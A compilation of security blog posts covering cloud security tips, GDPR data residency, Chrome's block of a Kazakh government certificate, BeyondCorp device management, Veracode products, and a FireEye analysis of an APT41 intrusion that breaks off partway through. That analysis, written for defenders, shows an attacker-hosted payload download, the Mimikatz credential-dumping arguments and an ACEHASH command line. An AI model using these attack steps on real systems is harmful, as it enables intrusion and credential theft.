  8. Neutralize and remove malware from the cloud.Malware can infect cloud workloads through shared folders that sync automatically with cloud storage services, spreading malware from an infected user device to another user’s device. Use a cloud security solution program to scan the files you’ve stored in the cloud to avoid malware, ransomware or data theft attacks. If malware is detected on a workload host or in a cloud application, it can be quarantined or removed, safeguarding sensitive data from compromise and preventing corruption of data by ransomware.
  9. Audit your IaaS configurations regularly.  The many critical settings in IaaS environments such as AWS or Azure can create exploitable weaknesses if misconfigured. Organizations have, on average, at least 14 misconfigured IaaS instances running at any given time, resulting in an average of nearly 2,300 misconfiguration incidents per month. Worse, greater than 1 in 20 AWS S3 buckets in use are misconfigured to be publicly readable.1 To avoid such potential for data loss, you’ll need to audit your configurations for identity and access management, network configuration, and encryption. McAfee offers a free Cloud Audit to help get you started.

 

  1. McAfee 2019 Cloud Adoption and Risk Report

 

The post 19 Cloud Security Best Practices for 2019 appeared first on McAfee Blogs.

Veracode Now Available on the Digital Marketplace G-Cloud UK

G Cloud Blog Featured Image

There is a deepening awareness that cyberthreats can never be eliminated completely, and digital resilience is an absolute necessity – and this is true for both private and public sector organizations and agencies. With this understanding, the UK Government created its G-Cloud Framework, which has transformed the way that public sector organizations can purchase information and communications technology in order to better build secure digital foundations. The program allows public bodies to buy commodity-based, pay-as-you-go cloud services through government-approved, short-term contracts via the Digital Marketplace. This procurement process supports the UK Government's Cloud First policy, as well as its desire to achieve a “Cloud Native” digital architecture.

Strengthening the security posture of your applications is critical in strengthening the security posture of your organization, and the Veracode Platform was created as a cloud-based application security solution because of the multitude of advantages it offers our customers. Not only are you able to avoid the expenses associated with purchasing hardware, procuring software, managing deployment and maintaining systems, you are also able to implement immediately – which means seeing results and value on day one. We’ve now made it even simpler for organizations within the UK to secure their application security portfolio: The Veracode Platform and services are now available for purchase on the Gov.co.uk Digital Marketplace.

Revolution not Evolution: How the UK Government Created a Cloud First Initiative

In 2010, the UK Government began a revolution that has influenced the way in which nations around the world are conducting business and structuring cybersecurity programs within their own government bodies and organizations. The creation of Government Digital Service (GDS), a consumer-facing portal and link for businesses that simplifies interacting with the government, led way to the adoption of a Cloud First policy for all government technology purchases.

The GDS team was created to more fundamentally rethink how government works in the modern era, with the aim to establish a digital center for the UK government that would bring the talent in-house, rather than relying on vendor expertise to make changes to government web applications and properties. The ultimate goal was to fix and enhance the way that people interact with the government, embed skills and capability across the government so that it could work in a new way, and open up data and APIs so other people could build on government-developed services.

The re-architecting of the government website began with a whiteboard and a heavy focus on user needs. The small team worked together to build a hub that would evoke a response, understanding that leading with imagery was really powerful, and iterated, changed, and improved as they honed in on the users’ needs. At that time, no other government technology had run in an agile fashion.

And then GDS team took it one step further by making all of its GitHub repositories open, because they considered it to be the people’s code, they wanted the people to help make their code better, and they knew it would make recruitment simpler if they could more easily show potential candidates what was under the hood. It allowed for different agencies within the government to work together more openly, which helped to reduce the risks associated with the open source code everyone was using.

The Cloud First Policy

This new approach to development also called for new processes and policies for acquiring software and working with technology vendors. In 2013, the UK government adopted a Cloud First, or Cloud Native, policy for all technology decisions. By operating in a Cloud Native framework, the government is able to adapt to how they organize their work to take advantage of what’s available in the market and any emerging technologies. This new policy made it mandatory to consider cloud solutions before alternatives, as well as making it necessary to demonstrate why non-cloud technologies would provide better value for the money if opting for an on-premise solution.

Further, the policy states that the government must also consider public cloud first – to consider SaaS models, particularly for enterprise IT and back office functions – and Infrastructure as a Service and Platform as a Service. The GDS team understands that without adapting and adopting technologies and focusing on core outcomes and principles, it won’t be able to meet the expectations of its users, and it won’t be prepared for the changes likely to arise as they manage growing volumes of data, and a proliferation of devices and sensors.

To truly become cloud native, the GDS transformed how it monitors and manages distributed systems to include diverse applications. It continues to deepen the conversations with vendors about the standards that will help them manage these types of technology shifts. Most of all, it continues to ensure it always chooses cloud providers that fit the needs at hand, rather than basing choices on recommendations.

To learn more about Veracode’s offerings on the Digital Marketplace G-Cloud UK, including our application security platform and services, click here.

IDG Contributor Network: Lack of cybersecurity is the biggest economic threat to the world over the next decade, CEOs say

In its 2019 CEO Imperative Study, Ernst & Young surveyed 200 global CEOs from the Forbes Global 2000 and Forbes Largest Private Companies across the Americas, Europe, the Middle East, Africa, and the Asia-Pacific region. Also interviewed were 100 senior investors from global firms that manage at least $100 billion in assets.

However, regardless of their location, CEOs, board directors and institutional investors cited national and corporate gaps in cybersecurity as the biggest threats to business growth and the global economy. Income inequality and job losses stemming from technological change came second and third in the list of threats, while ethics in artificial intelligence and climate change respectively rounded out the top five.

To read this article in full, please click here

Data Residency: A Concept Not Found In The GDPR

Are you facing customers telling you that their data must be stored in a particular location?

Be reassured: As a processor of data, we often encounter a discussion about where the data is resident, and we are often facing people certain that their data must be stored in a given country. But the truth is, most people don’t have the right answer to this legal requirement.

To understand the obligations and requirements surrounding data storage, you first need to understand the difference in concepts between “data residency” and “data localization.”

What Are Data Residency and Data Localization?

Data residency is when an organization specifies that their data must be stored in a geographical location of their choice, usually for regulatory, tax or policy reasons. By contrast, data localization is when a law requires that data created within a certain territory stays within that territory.

People arguing that data must be stored in a certain location are usually pursuing at least one of the following three objectives:

  1. To allow data protection authorities to exert more control over data retention and thereby have greater control over compliance.
  2. In the EU, it is seen as means to encourage data controllers to store and process data within the EU or within those countries deemed to have the same level of data protection as in the EU, as opposed to moving data to those territories considered to have less than “adequate” data protection regimes. The EU has issued only 13 adequacy decisions: for Andorra, Argentina, Canada (commercial organizations), Faroe Islands, Guernsey, Israel, Isle of Man, Japan, Jersey, New Zealand, Switzerland, US (Privacy Shield only) and Uruguay.
  3. Finally, it is seen by some as a tool to strengthen the market position of local data center providers by forcing data to be stored in-country.

However, it is important to note that accessing personal data is considered a “transfer” under data protection law—so even if data is stored in Germany (for example), if a company has engineers in India access the data for customer service or support purposes, it has now “moved” out of Germany. Therefore, you can’t claim “residency” in Germany if there is access by a support function outside the country. Additionally, payment processing functions also sometimes occur in other countries, so make sure to consider them as well. This is an important point that is often missed or misunderstood.

Having understood the concept of data residency and data localization, the next question is, are there data residency or localization requirements under GDPR?

In short: No. GDPR does not introduce and does not include any data residency or localization obligations. There were also no data residency or localization obligations under the GDPR’s predecessor, the Data Protection Directive (95/46/EC). In fact, both the Directive and the GDPR establish methods for transferring data outside the EU.

Having said that, it is important to note that local law may impose certain requirements on the location of the data storage (e.g., Russia’s data localization law, German localization law for health and telecom data, etc.).

So, if there is no data residency or localization requirement under GDPR, can we transfer the data to other locations?

The GDPR substantially repeats the requirements of the Data Protection Directive, which states that you need to have legal transfer means if you move data outside of the EU into a jurisdiction with inappropriate safeguards (see map here). The legal transfer means are:

  • Adequacy— A decision by the EU Commission that a country has adequate protection level;
  • Binding Corporate Rules— Binding internal rules of a company to be approved by data protection authorities;
  • Standard Contractual Clauses / Model Clauses—Individually negotiated contracts between controller and processor
  • Privacy Shield— For US companies only; this is a replacement self-certification program for the Safe Harbor.

I have heard that Privacy Shield and Standard Contractual Clauses are under serious scrutiny? What is this all about?

Following the European Court of Justice decision that the EU-US Safe Harbor arrangement does not provide adequate protection for the personal data of EU data subjects, the EU and US entered into a new arrangement to enable the transfer of data (the Privacy Shield). However, a number of non-governmental organizations and privacy advocates have started legal action to seek decisions that the Privacy Shield and the EU Standard Contractual Clauses do not provide sufficient protection of data subjects’ personal data.

It remains to be seen how the European Court of Justice will decide in these cases. They are expected to rule on these matters by the end of 2019.

I have heard that the Standard Contractual Clauses/Model Clauses might be updated.  What is that all about? 

In order to protect data being transferred outside of the European Union, the Union issued three Standard Contractual Clause templates (for controller to controller transfers and for controller to processor transfers). These have not been updated since they were first introduced in 2001, 2004 and 2010, respectively. However, the European Union’s consumer commissioner, under whom privacy falls, has indicated that the EU is working on an updated version of the Standard Contractual Clauses. It remains to be seen how the Clauses will be modernized and whether the shortcomings, concerns and gripes of existing Standard Contractual Clauses will be addressed to the satisfaction of all parties.

One thing is for certain, however—the data protection space will only get more attention from here on out, and those of us working in this space will have to become more accustomed to complexities such as those surrounding Data Residency.

 

This blog is for information purposes only and does not constitute legal advice, contractual commitment or advice on how to meet the requirements of any applicable law or achieve operational privacy and security. It is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of applicable privacy laws, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with privacy laws or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

 

The post Data Residency: A Concept Not Found In The GDPR appeared first on McAfee Blogs.

Protecting Chrome users in Kazakhstan



When making secure connections, Chrome trusts certificates that have been locally installed on a user's computer or mobile device. This allows users to run tools to inspect and debug connections during website development, or for corporate environments to intercept and monitor internal traffic. It is not appropriate for this mechanism to be used to intercept traffic on the public internet.

In response to recent actions by the Kazakhstan government, Chrome, along with other browsers, has taken steps to protect users from the interception or modification of TLS connections made to websites.

Chrome will be blocking the certificate the Kazakhstan government required users to install:

Common Name
Qaznet Trust Network
SHA-256 Fingerprint
00:30:9C:73:6D:D6:61:DA:6F:1E:B2:41:73:AA:84:99:44:C1:68:A4:3A:15:
BF:FD:19:2E:EC:FD:B6:F8:DB:D2
SHA-256 of Subject Public Key Info
B5:BA:8D:D7:F8:95:64:C2:88:9D:3D:64:53:C8:49:98:C7:78:24:91:9B:64:
EA:08:35:AA:62:98:65:91:BE:50


The certificate has been added to CRLSet. No action is needed by users to be protected. In addition, the certificate has been added to a blocklist in the Chromium source code and thus should be included in other Chromium based browsers in due course.

Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks appeared first on McAfee Blogs.

Chris Young and Ken McCray Recognized on CRN’s 2019 Top 100 Executives List

CRN, a brand of The Channel Company, recently recognized McAfee CEO Chris Young and Head of Channel Sales Operations for the Americas Ken McCray in its list of Top 100 Executives of 2019. This annual list honors technology executives who lead, influence, innovate and disrupt the IT channel.

Over the past year, Young led McAfee into the EDR space, directed the introduction of McAfee’s cloud and unified data protection offerings, and forged a partnership with Samsung to safeguard the Galaxy S10 mobile device. According to CRN, these accomplishments earned Young the number-three spot in CRN’s list of 25 Most Innovative Executives—a subset of the Top 100 list that recognizes executives “who are always two steps ahead of the competition.” Young is no stranger to the Top 100 Executives list: He also earned a place on last year’s list, when his post-spinout acquisitions led to him being named one of the Top 25 Disruptors of 2018.

Based on his work overseeing the launch of McAfee’s alternative route to market channel initiative, Ken McCray was also recognized as one of this year’s Top 100 Executives. The initiative, which has driven incremental bookings as Managed Security Partners and cloud service providers bring new customers on board, earned McCray a spot on the Top 25 IT Channel Sales Leaders of 2019. This has been an accolade-filled year for McCray: In February, he was named one of the 50 Most Influential Channel Chiefs for 2019, based on his division’s double-digit growth and the relationships he built with key cloud service providers.

The Top 100 Executives being recognized drive cultural transformation, revenue growth, and technological innovation across the IT channel. In doing so, they help solution providers and technology suppliers survive—and thrive—in today’s always-on, always-connected global marketplace.

“The IT channel is rapidly growing, and navigating this fast-paced market often challenges solution providers and technology suppliers alike,” said Bob Skelley, CEO of The Channel Company. “The technology executives on CRN’s 2019 Top 100 Executives list understand the IT channel’s potential. They provide strategic and visionary leadership and unparalleled guidance to keep the IT channel moving in the right direction—regardless of the challenges that come their way.”

We at McAfee are proud of the recognition Young and McCray have received, and look forward to seeing our company continue to thrive under their leadership.

The Top 100 Executives list is featured in the August 2019 issue of CRN Magazine and online at www.CRN.com/Top100.

The post Chris Young and Ken McCray Recognized on CRN’s 2019 Top 100 Executives List appeared first on McAfee Blogs.

The Cybersecurity Playbook: Why I Wrote a Cybersecurity Book

I ruined Easter Sunday 2017 for McAfee employees the world over. That was the day our company’s page on a prominent social media platform was defaced—less than two weeks after McAfee had spun out of Intel to create one of the world’s largest pure-play cybersecurity companies. The hack would have been embarrassing for any company; it was humiliating for a cybersecurity company. And, while I could point the finger of blame in any number of directions, the sobering reality is that the hack happened on my watch, since, as the CMO of McAfee, it was my team’s responsibility to do everything in our power to safeguard the image of our company on that social media platform. We had failed to do so.

Personal accountability is an uncomfortable thing. Defensive behavior comes much more naturally to many of us, including me. But, without accountability, change is hindered. And, when you find yourself in the crosshairs of a hacker, change—and change quickly—you must.

I didn’t intend to ruin that Easter Sunday for my colleagues. There was nothing I wanted less than to call my CEO and peers and spoil their holiday with the news. And, I didn’t relish having to notify all our employees of the same the following Monday. It wasn’t that I was legally obligated to let anyone know of the hack; after all, McAfee’s systems were never in jeopardy. But our brand reputation took a hit that day, and our employees deserved to know that their CMO had let her guard down just long enough for an opportunistic hacker to strike.

I tell you this story not out of self-flagellation or so that you can feel, “Hey, better her than me!” I share this story because it’s a microcosm of why I wrote a book, The Cybersecurity Playbook: How Every Leader and Employee Can Contribute to a Culture of Security.

I’m not alone in having experienced an unfortunate hack that may have been prevented had my team and I been more diligent in practicing habits to minimize it. Every day, organizations are attacked the world over. And, behind every hack, there’s a story. There’s hindsight of what might have been done to avoid it. While the attack on that Easter Sunday was humbling, the way in which my McAfee teammates responded, and the lessons we learned, were inspirational.

I realized in the aftermath that there’s a real need for a playbook that gives every employee—from the frontline worker to the board director—a prescription for strong cybersecurity hygiene. I realized that everyone can play an indispensable role in protecting her organization from attack. And, I grasped that common sense is not always common practice.

There’s no shortage of cybersecurity books available for your consumption from reputable, talented authors with a variety of experiences. You’ll find some from journalists, who have dissected some of the most legendary breaches in history. You’ll find others from luminaries, who speak with authority as being venerable forefathers of the industry. And you’ll find more still from technical experts, who decipher the intricate elements of cybersecurity in significant detail.

But, you won’t find many from marketers. So why trust this marketer with a topic of such gravity? Because this marketer not only works for a company that has its origins in cybersecurity but found herself on her heels that fateful Easter Sunday. I know what it’s like to have to respond—and respond fast—when time is not on your side and your reputation is in the hands of a hacker. And, while McAfee certainly had a playbook to act accordingly, I realized that every company should have the same.

So, whether you’re in marketing, human resources, product development, IT or finance—or a board member, CEO, manager or individual contributor—this book gives you a playbook to incorporate cybersecurity habits in your routine. I’m not so naïve as to believe that cybersecurity will become everyone’s primary job. But, I know that cybersecurity is now too important to be left exclusively in the hands of IT. And, I am idealistic to envision a workplace where sound cybersecurity practice becomes so routine, that all employees regularly do their part to collectively improve the defenses of their organization. I hope this book empowers action; your organization needs you in this fight.

Allison Cerra’s book, The Cybersecurity Playbook: How Every Leader and Employee Can Contribute to a Culture of Security, is scheduled to be released September 12, 2019 and can be preordered at amazon.com.

The post The Cybersecurity Playbook: Why I Wrote a Cybersecurity Book appeared first on McAfee Blogs.

How Google adopted BeyondCorp: Part 2 (devices)




Intro

This is the second post in a series of four, in which we set out to revisit various BeyondCorp topics and share lessons that were learnt along the internal implementation path at Google.

The first post in this series focused on providing necessary context for how Google adopted BeyondCorp. This post will focus on managing devices - how we decide whether or not a device should be trusted and why that distinction is necessary. Device management provides both the data and guarantees required for making access decisions by securing the endpoints and providing additional context about it.


How do we manage devices?

At Google, we use the following principles to run our device fleet securely and at scale:
  • Secure default settings at depth with central enforcement
  • Ensure a scalable process
  • Invest in fleet testing, monitoring, and phased rollouts
  • Ensure high quality data
Secure default settings

Defense in depth requires us to layer our security defenses such that an attacker would need to pass multiple controls in an attack. To uphold this defensive position at scale, we centrally manage and measure various qualities of our devices, covering all layers of the platform;

  • Hardware/firmware configuration
  • Operating system and software
  • User settings and modifications
We use automated configuration management systems to continuously enforce our security and compliance policies. Independently, we observe the state of our hardware and software. This allows us to determine divergence from the expected state and verify whether it is an anomaly.

Where possible, our platforms use native OS capabilities to protect against malicious software, and we extend those capabilities across our platforms with custom and commercial tooling.


Scalable process

Google manages a fleet of several hundred thousand client devices (workstations, laptops, mobile devices) for employees who are spread across the world. We scale the engineering teams who manage these devices by relying on reviewable, repeatable, and automated backend processes and minimizing GUI-based configuration tools. By using and developing open-source software and integrating it with internal solutions, we reach a level of flexibility that allows us to manage fleets at scale without sacrificing customizability for our users. The focus is on operating system agnostic server and client solutions, where possible, to avoid duplication of effort.

Software for all platforms is provided by repositories which verify the integrity of software packages before making them available to users. The same system is used for distributing configuration settings and management tools, which enforce policies on client systems using the open-source configuration management system Puppet, running in standalone mode. In combination, this allows us to easily scale infrastructure and management horizontally as described in more detail and with examples in one of our BeyondCorp whitepapers, Fleet Management at Scale.

All device management policies are stored in centralized systems which allow settings to be applied both at the fleet and the individual device level. This way policy owners and device owners can manage sensible defaults or per-device overrides in the same system, allowing audits of settings and exceptions. Depending on the type of exception, they may either be managed self-service by the user, require approval from appropriate parties, or affect the trust level of the affected device. This way, we aim to guarantee user satisfaction and security simultaneously.


Fleet testing, monitoring, and phased rollouts

Applying changes at scale to a large heterogeneous fleet can be challenging. At Google, we have automated test labs which allow us to test changes before we deploy them to the fleet. Rollouts to the client fleet usually follow multiple stages and random canarying, similar to common practices with service management. Furthermore, we monitor various status attributes of our fleet which allows us to detect issues before they spread widely.

High quality data

Device management depends on the quality of device data. Both configuration and trust decisions are keyed off of inventory information. At Google, we track all devices in centralized asset management systems. This allows us to not only observe the current (runtime) state of a device, but also whether it’s a legitimate Google device. These systems store hardware attributes as well as the assignment and status of devices, which lets us match and compare prescribed values to those which are observed.

Prior to implementing BeyondCorp, we performed a fleet-wide audit to ensure the quality of inventory data, and we perform smaller audits regularly across the fleet. Automation is key to achieving this, both for entering data initially and for detecting divergence at later points. For example, instead of having a human enter data into the system manually, we use digital manifests and barcode scanners as much as possible.


How do we figure out whether devices are trustworthy?

After appropriate management systems have been put in place, and data quality goals have been met, the pertinent security information related to a device can be used to establish a "trust" decision as to whether a given action should be allowed to be performed from the device.



High level architecture for BeyondCorp


This decision can be most effectively made when an abundance of information about the device is readily available. At Google, we use an aggregated data pipeline to gather information from various sources, which each contain a limited subset of knowledge about a device and its history, and make this data available at the point when a trust decision is being made.

Various systems and repositories are employed within Google to perform collection and storage of device data that is relevant to security. These include tools like asset management repositories, device management solutions, vulnerability scanners, and internal directory services, which contain information and state about the multitude of physical device types (e.g., desktops, laptops, phones, tablets), as well as virtual desktops, used by employees at the company.

Having data from these various types of information systems available when making a trust decision for a given device can certainly be advantageous. However, challenges can present themselves when attempting to correlate records from a diverse set of systems which may not have a clear, consistent way to reference the identity of a given device. The challenge of implementation has been offset by the gains in security policy flexibility and improvements in securing our data.


What lessons did we learn?
As we rolled out BeyondCorp, we iteratively improved our fleet management and inventory processes as outlined above. These improvements are based on various lessons we learned around data quality challenges.

Audit your data ahead of implementing BeyondCorp

Data quality issues and inaccuracies are almost certain to be present in an asset management system of any substantial size, and these issues must be corrected before the data can be utilized in a manner which will have a significant impact on user experience. Having the means to compare values that have been manually entered into such systems against similar data that has been collected from devices via automation can allow for the correction of discrepancies, which may interrupt the intended behavior of the system.


Prepare to encounter unforeseen data quality challenges

Numerous data incorrectness scenarios and challenging issues are likely to present themselves as the reliance on accurate data increases. For example, be prepared to encounter issues with data ingestion processes that rely on transcribing device identifier information, which is physically labeled on devices or their packaging, and may incorrectly differ from identifier data that is digitally imprinted on the device.

In addition, over reliance on the assumed uniqueness of certain device identifiers can sometimes be problematic in the rare cases where conventionally unique attributes, like serial numbers, can appear more than once in the device fleet (this can be especially exacerbated in the case of virtual desktops, where such identifiers may be chosen by a user without regard for such concerns).

Lastly, routine maintenance and hardware replacements performed on employee devices can result in ambiguous situations with regards to the "identity" of a device. When internal device components, like network adapters or mainboards, are found to be defective and replaced, the device's identity can be changed into a state which no longer matches the known inventory data if care is not taken to correctly reflect such changes. 


Implement controls to maintain high quality asset inventory

After inventory data has been brought to an acceptable correctness level, mechanisms should be put into place to limit the ability for new inaccuracies to be introduced. For example, at Google, data correctness checks have been integrated into the provisioning process for new devices so that inventory records must be correct before a device can be successfully imaged with an operating system, ensuring that the device will meet required data accuracy standards before being delivered to an employee.

Next time
In the next post in this series, we will discuss a tiered access approach, how to create rule-based trust and the lessons we’ve learned through that process.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

Thank you to the editors of the BeyondCorp blog post series, Puneet Goel (Product Manager), Lior Tishbi (Program Manager), and Justin McWilliams (Engineering Manager).

OpenSAT19 Workshop

The workshop is for developers to share their experiences with Speech Activity Detection (SAD), Automated Speech Recognition(ASR), and Keyword Search (KWS) algorithms or systems when applied to the data

Introducing the New Veracode Software Composition Analysis

Veracode Software Composition Analysis Announcement

Open source technology empowers developers to make software better, faster, and more efficiently as they push the envelope and delight users with desired features and functionality. This is a trend that is unlikely to fade – at least not in the foreseeable future – and has further fueled our passion for securing the world’s software. This is also why Veracode acquired SourceClear – we had a vision for the impact that integrating our software composition analysis (SCA) technologies would have on our customers’ ability to develop bold, revolutionary software using open source code – without risking their security posture.

Today, our customers have access to an industry-leading, scalable SCA solution that provides unparalleled support for SCA in DevSecOps environments through the cloud-based Veracode Application Security Platform. Veracode SCA offers a unique vulnerable method detection technology that increases the actionability of SCA scan results, as well as the ability to receive continuous alerts on new or updated vulnerabilities without rescanning an application.

Further, our solution relies on a proprietary library and vulnerability database, built using true machine learning and data mining, which has the ability to identify vulnerabilities not available in the National Vulnerability Database (NVD). In addition to CVEs, the database now also includes Reserved CVEs and No-CVEs detected with our data mining and machine learning models. These results are verified by our expert data research team for all supported languages.

Software Composition Analysis for DevSecOps Environments

Veracode SCA offers remediation guidance, SaaS-based scalability, and integration with Continuous Integration tools to provide users with visibility into all direct and indirect open source libraries in use, known and unknown vulnerabilities in those libraries, and how they impact applications, without slowing down development velocity. 

Additionally, it is the only solution in the market that offers two options to start an SCA scan that offers insight into open source vulnerabilities, library versions, and licenses:

Scan via Application Binary Upload

Through the traditional application upload process, you’re able to upload your applications or binaries to the Veracode Application Security Platform so that you can run scans via the UI or an API.

SCA scans continue to run alongside Veracode Static Analysis. During the pre-scan evaluation for static scanning, Veracode executes the SCA scan to review the application’s composition, and the results are delivered while the static scan continues. Bill of materials, scores, policy definition, and open source license detection remain available for those application upload scans.

Veracode has also added language support for applications developed in Golang, Ruby, Python, PHP, Scala, Objective-C, and Swift, in addition to the existing support for Java, JavaScript, Node.js, and .NET applications.

Agent-Based Scanning

Agent-based scanning, integrated within the Veracode Application Security Platform, enables you to scan your source code repositories directly, either manually from the command line or in a Continuous Integration pipeline. The agent-based scanning process has been enhanced to include more open source license types available for detection in open source libraries. The libraries and vulnerabilities database has been enhanced with an increase of new vulnerabilities detected, and the ability to link project scans with application profiles for policy compliance, reporting, and PDF reports. Customers using Veracode SCA agent-based scanning can conduct:

  • Vulnerable Method Detection: Pinpoint the line of code where developers can determine if their code is calling on the vulnerable part of the open source library. 
  • Auto Pull Requests: Veracode SCA identifies vulnerabilities and makes recommendations for using a safer version of the library. This feature automatically generates pull requests ready to be merged with your code in GitHub, GitHub Enterprise, or GitLab. It provides the fix for you.
  • Container Scanning: Scan Docker containers and container images for open source vulnerabilities in Linux distributions and base libraries. 

Users have the flexibility to use both scanning types for the same application. Agent-based scanning can be used during development, and a traditional binary upload scan can be conducted before the application is put into production. Scan results continue to be assessed against the chosen policy and prompt users to take action based on the results. These actions can be automated with integration to Jenkins (or another Continuous Integration tool) to either break the build because of a failed policy scan, or to simply report the failed policy.

It’s no exaggeration to say that every company is becoming a software company, and the adoption of open source is on the rise. Having clear visibility into the open source components within your application portfolio reduces the risk of breach through vulnerabilities. The new Veracode Software Composition Analysis solution helps our customers confidently use open source components without introducing unnecessary risk. 

To learn more about Veracode Software Composition Analysis, download the technical whitepaper, “Accelerating Software Development with Secure Open Source Software.”

GAME OVER: Detecting and Stopping an APT41 Operation

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.

Our knowledge of this group’s targets and activities are rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection – protecting our clients’ networks and limiting the threat actor’s ability to gain a foothold and/or prevent data exposure.

GET TO DA CHOPPA!

In April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.


Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.


Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.


Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.


Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script – “privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • F64.data (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and F64.data on the system, the attacker ran the command

c64.exe f64.data "9839D7F1A0 -m”

